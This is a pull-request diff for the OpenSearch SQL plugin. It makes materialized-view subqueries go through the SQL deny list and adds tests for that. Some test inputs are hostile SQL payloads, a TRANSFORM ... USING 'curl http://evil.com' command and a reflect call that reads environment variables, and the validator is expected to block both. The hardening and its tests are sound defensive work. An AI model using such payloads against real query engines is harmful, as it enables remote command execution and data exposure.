Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -184,6 +184,7 @@ public enum FunctionType {
"from_unixtime",
"from_utc_timestamp",
"hour",
"hop",
"last_day",
"localtimestamp",
"make_date",
Expand Down Expand Up @@ -211,6 +212,7 @@ public enum FunctionType {
"to_unix_timestamp",
"to_utc_timestamp",
"trunc",
"tumble",
"try_to_timestamp",
"unix_date",
"unix_micros",
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.opensearch.sql.datasource.model.DataSourceType;
import org.opensearch.sql.spark.dispatcher.model.IndexQueryDetails;
import org.opensearch.sql.spark.utils.SQLQueryUtils;

/** Validate input SQL query based on the DataSourceType. */
Expand Down Expand Up @@ -38,10 +39,18 @@ public void validate(String sqlQuery, DataSourceType datasourceType) {
}

/**
* Validates a query from the Flint extension grammar. The method is currently a no-op.
* Validates a Flint extension query by extracting and validating any embedded SQL subquery. For
* CREATE MATERIALIZED VIEW statements, the inner query is validated against the same deny list
* used for standard SQL queries.
*
* @param sqlQuery The Flint extension query to be validated
* @param dataSourceType The type of the datasource the query is being run on
*/
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {}
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {
IndexQueryDetails indexQueryDetails = SQLQueryUtils.extractIndexDetails(sqlQuery);
String mvQuery = indexQueryDetails.getMvQuery();
if (mvQuery != null) {
validate(mvQuery, dataSourceType);
}
}
}
Original file line number Diff line number Diff line change
Expand Up @@ -501,6 +501,77 @@ void testDispatchShowMVQuery() {
testDispatchBatchQuery("SHOW MATERIALIZED VIEW IN mys3.default");
}

@Test
void testDispatchMVWithWindowFunctionAllowed() {
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
MY_GLUE, asyncQueryRequestContext))
.thenReturn(dataSourceMetadata);

String query =
"CREATE MATERIALIZED VIEW my_glue.default.mv_window AS"
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
+ " FROM my_glue.default.http_logs WHERE status != 200"
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
+ " checkpoint_location = 's3://bucket/checkpoint',"
+ " watermark_delay = '10 Minutes')";

DispatchQueryResponse response =
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
verify(emrServerlessClient, times(1)).startJobRun(any());
assertEquals(EMR_JOB_ID, response.getJobId());
}

@Test
void testDispatchMVWithTumbleFunctionAllowed() {
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
MY_GLUE, asyncQueryRequestContext))
.thenReturn(dataSourceMetadata);

String query =
"CREATE MATERIALIZED VIEW my_glue.default.mv_tumble AS"
+ " SELECT window.start AS `start.time`, COUNT(*) AS count"
+ " FROM my_glue.default.http_logs WHERE status != 200"
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
+ " WITH (auto_refresh = false)";

DispatchQueryResponse response =
sparkQueryDispatcher.dispatch(getBaseDispatchQueryRequest(query), asyncQueryRequestContext);
verify(emrServerlessClient, times(1)).startJobRun(any());
assertEquals(EMR_JOB_ID, response.getJobId());
}

@Test
void testDispatchMVWithTransformBlocked() {
DataSourceMetadata dataSourceMetadata = constructMyGlueDataSourceMetadata();
when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
MY_GLUE, asyncQueryRequestContext))
.thenReturn(dataSourceMetadata);

String query =
"CREATE MATERIALIZED VIEW my_glue.default.mv_exploit AS"
+ " SELECT TRANSFORM(status) USING 'curl http://evil.com' AS x"
+ " FROM my_glue.default.http_logs"
+ " WITH (auto_refresh = false)";

IllegalArgumentException exception =
Assertions.assertThrows(
IllegalArgumentException.class,
() ->
sparkQueryDispatcher.dispatch(
getBaseDispatchQueryRequest(query), asyncQueryRequestContext));
Assertions.assertTrue(exception.getMessage().contains("TRANSFORM is not allowed"));
verifyNoInteractions(emrServerlessClient);
}

@Test
void testRefreshIndexQuery() {
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,6 @@
import static org.mockito.Mockito.when;

import java.util.Arrays;
import java.util.UUID;
import lombok.AllArgsConstructor;
import lombok.Getter;
import org.antlr.v4.runtime.CommonTokenStream;
Expand Down Expand Up @@ -577,11 +576,111 @@ void testSecurityLakeQueries() {
}

@Test
void testValidateFlintExtensionQuery() {
void testValidateFlintExtensionQuery_safeQuery() {
when(mockedProvider.getValidatorForDatasource(any()))
.thenReturn(new S3GlueSQLGrammarElementValidator());
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE MATERIALIZED VIEW mv AS select * from table WITH (auto_refresh = false)",
DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_blocksTransformInMV() {
when(mockedProvider.getValidatorForDatasource(any()))
.thenReturn(new S3GlueSQLGrammarElementValidator());
assertThrows(
IllegalArgumentException.class,
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE MATERIALIZED VIEW mv AS SELECT TRANSFORM(id) USING 'cmd' AS x FROM tbl"
+ " WITH (auto_refresh = false)",
DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_blocksReflectInMV() {
when(mockedProvider.getValidatorForDatasource(any()))
.thenReturn(new S3GlueSQLGrammarElementValidator());
assertThrows(
IllegalArgumentException.class,
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE MATERIALIZED VIEW mv AS SELECT reflect('java.lang.System', 'getenv',"
+ " 'PATH') FROM tbl WITH (auto_refresh = false)",
DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_nonMVStatementsPass() {
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"DROP MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"REFRESH MATERIALIZED VIEW mv", DataSourceType.S3GLUE));
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE SKIPPING INDEX ON tbl (col VALUE_SET)", DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_mvWithWindowFunction() {
when(mockedProvider.getValidatorForDatasource(any()))
.thenReturn(new S3GlueSQLGrammarElementValidator());
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
+ " GROUP BY window(`@timestamp`, '1 Minutes')"
+ " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
+ " checkpoint_location = 's3://bucket/checkpoint',"
+ " watermark_delay = '10 Minutes')",
DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_mvWithTumbleFunction() {
when(mockedProvider.getValidatorForDatasource(any()))
.thenReturn(new S3GlueSQLGrammarElementValidator());
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
+ " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
+ " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
+ " WITH (auto_refresh = false)",
DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_mvWithHopFunction() {
when(mockedProvider.getValidatorForDatasource(any()))
.thenReturn(new S3GlueSQLGrammarElementValidator());
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
"CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
+ " COUNT(*) AS count FROM ds.default.http_logs"
+ " GROUP BY HOP(`@timestamp`, '5 Minutes', '10 Minutes')"
+ " WITH (auto_refresh = false)",
DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_coveringIndexPass() {
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
UUID.randomUUID().toString(), DataSourceType.SECURITY_LAKE));
"CREATE INDEX idx ON ds.default.http_logs (status, day, clientip)"
+ " WITH (auto_refresh = true, refresh_interval = '5 minute',"
+ " checkpoint_location = 's3://bucket/checkpoint')",
DataSourceType.S3GLUE));
}

@Test
Expand Down
1 change: 1 addition & 0 deletions release-notes/opensearch-sql.release-notes-3.7.0.0.md
Original file line number Diff line number Diff line change
Expand Up @@ -32,6 +32,7 @@ Compatible with OpenSearch and OpenSearch Dashboards version 3.7.0
* Create parquet-backed test indices for `spath` command analytics-engine route ([#5441](https://github.com/opensearch-project/sql/pull/5441))
* Improve error messages for invalid index mapping by formatting index patterns and including underlying error details ([#5370](https://github.com/opensearch-project/sql/pull/5370))
* Initial implementation of report-builder interface for richer error context in responses ([#5266](https://github.com/opensearch-project/sql/pull/5266))
* Validate materialized view subqueries against SQL grammar deny list ([#5485](https://github.com/opensearch-project/sql/pull/5485))

### Bug Fixes

Expand Down
Loading